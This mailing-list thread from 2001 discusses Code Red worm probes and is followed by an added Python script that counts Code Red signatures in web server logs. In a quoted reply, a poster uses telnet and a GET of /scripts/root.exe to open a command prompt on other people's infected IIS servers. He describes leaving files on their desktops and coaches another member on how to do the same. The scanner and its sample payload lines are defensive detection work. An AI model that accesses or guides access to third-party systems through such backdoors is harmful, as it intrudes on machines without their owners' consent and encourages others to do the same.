CR worm infection attempts

Kim Allen plug-discuss@lists.PLUG.phoenix.az.us
Wed, 8 Aug 2001 13:41:13 -0700 (MST)


I've been contacting the sites that my server logs show have been 
hitting me with the Code Red signature, and so far no one has bothered to 
respond except for one. However, that site has told me how secure they are 
and how there is no way that they have any problems. When I sent them the 
portions of my server logs showing they do have a problem, they threatened 
legal action. Has anyone else had this type of response?

> To answer your question... make sure you're hitting enter TWICE after
> the command.
> 
> As a security guy myself, I'm deeply troubled by what I'm finding.
> Check it out:
> 
> [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> Trying xxx.xxx.xxx.xxx...
> Connected to xxx.xxx.xxx.xxx.
> Escape character is '^]'.
> GET /scripts/root.exe HTTP/1.0
> 
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> Date: Mon, 06 Aug 2001 04:22:13 GMT
> Content-Type: application/octet-stream
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-1999 Microsoft Corp.
> 
> c:\inetpub\scripts>
> 
> From here, I've been leaving a nice text file on \\ALL USERS\\ desktops
> that explains how I did it, and why they need to pay attention to
> security patches. :)
> 
> Hopefully they won't take it the 'wrong' way.
> 
> ~g~
> 
> On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > Wayne Conrad wrote:
> > > 
> > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > I got tired of counting and just started putting the info into my IDS page.
> > > > That way I can send complaints and point them to a URL so I don't have to
> > > > keep recreating the same data each time.
> > > 
> > > Are you putting the IPs up too?  Every one of the CRII infected boxes is rooted...  I wonder about the goodness of publishing a list of known rooted boxes.
> > >     Wayne
> > ________________________________________________
> > 
> > I've been trying that out
> > 
> > telnet ipaddress_from_my_httpd_access_log 80
> > 
> > GET /scripts/root.exe HTTP/1.0
> > 
> > but I can't get a command prompt - what am I missing?
> > 
> > Craig
> > ________________________________________________
> > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > 
> > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > 
> 
> 
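As an added example (not code from anyone in the thread): a small Python scanner that pulls the Code Red signatures the posters are tallying by hand out of Apache access-log lines (the default.ida overflow probe and the /scripts or /MSADC root.exe backdoor check) and counts them per source address, producing the per-IP list that complaints or an IDS page would be built from. The log lines are constructed, and the signature patterns come from the public Code Red / Code Red II write-ups rather than from the thread.

```python
import re
from collections import Counter, defaultdict

# Request paths left behind by the Code Red family on probed hosts:
# the .ida overflow probe (N's for Code Red, X's for Code Red II) and
# the root.exe copy of cmd.exe that Code Red II drops into /scripts and /MSADC.
SIGNATURES = {
    "code-red-ida": re.compile(r"^/default\.ida\?[NX]{20,}%u9090", re.I),
    "root.exe-backdoor": re.compile(r"^/(scripts|msadc)/root\.exe", re.I),
}

# Apache combined log format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def classify(path):
    """Name the worm signature a request path matches, or None for ordinary traffic."""
    for name, pat in SIGNATURES.items():
        if pat.search(path):
            return name
    return None

def scan(lines):
    """Return {source_ip: {signature: count}} for log lines that match a signature."""
    hits = defaultdict(Counter)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        sig = classify(m["path"])
        if sig:
            hits[m["host"]][sig] += 1
    return hits

def report(hits):
    """One tab-separated row per source, busiest first: ip, total, per-signature detail."""
    rows = []
    for host, sigs in sorted(hits.items(), key=lambda kv: -sum(kv[1].values())):
        detail = ", ".join(f"{s}={n}" for s, n in sorted(sigs.items()))
        rows.append(f"{host}\t{sum(sigs.values())}\t{detail}")
    return rows

# Constructed sample log lines (addresses, times and payload are made up for the example).
SAMPLE = """\
10.0.0.5 - - [06/Aug/2001:04:22:13 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801 HTTP/1.0" 400 325
10.0.0.5 - - [06/Aug/2001:04:23:02 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
10.0.0.9 - - [06/Aug/2001:05:01:44 -0700] "GET /index.html HTTP/1.1" 200 1043
10.0.0.7 - - [06/Aug/2001:05:10:09 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 290
""".splitlines()
```

Running `report(scan(open("access_log").read().splitlines()))` over a real log gives the same per-IP tally; an entry with both signatures from one address is the usual sign of a box that was overflowed and then probed for its own backdoor.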